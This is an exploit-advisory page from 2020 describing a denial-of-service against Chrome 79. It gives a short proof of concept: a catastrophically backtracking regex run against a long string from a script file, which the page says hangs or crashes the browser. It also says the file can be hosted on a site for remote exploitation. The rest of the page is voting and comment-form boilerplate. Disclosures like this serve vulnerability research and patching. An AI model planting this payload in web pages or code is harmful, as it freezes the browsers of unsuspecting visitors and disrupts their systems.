Chrome crash by regex run

2020.01.25

mahdyfof (IR)

Risk: Medium

Local: Yes

Remote: Yes

CVE: N/A

CWE: N/A

Chrome version: 79.0.3945.130 (Official Build) (64-bit) (cohort: 79_Win_130) Channel: n/a
Flash Version: 32.0.0.314
Tested on OS: Windows 10
Credit: mahdyfof@gmail.com
__________________________________________________________________________
1. Make a js file with this content:
/((?<!\\)("(\\.|[^\\"]+)+"|""|('(\\.|[^\\']+)+')|''|(`(\\.|[^\\`]+)+`)|``))/.test("\": *Aug 30 22:23:13.asdsadasdasdasdasdasd asd asd asd asd asd asdasdasdasdsadak sadsa das das dasd asd asdasdasd");
2. Include it in an HTML file. <script src="1.js"></script>
3. Open the html file in Chrome browser.
It causes the browser to crash and hang. In many systems you cannot even close the window unless you use task manager.
You can put it in a site for remote exploitation or do it locally.

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Chrome crash by regex run

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.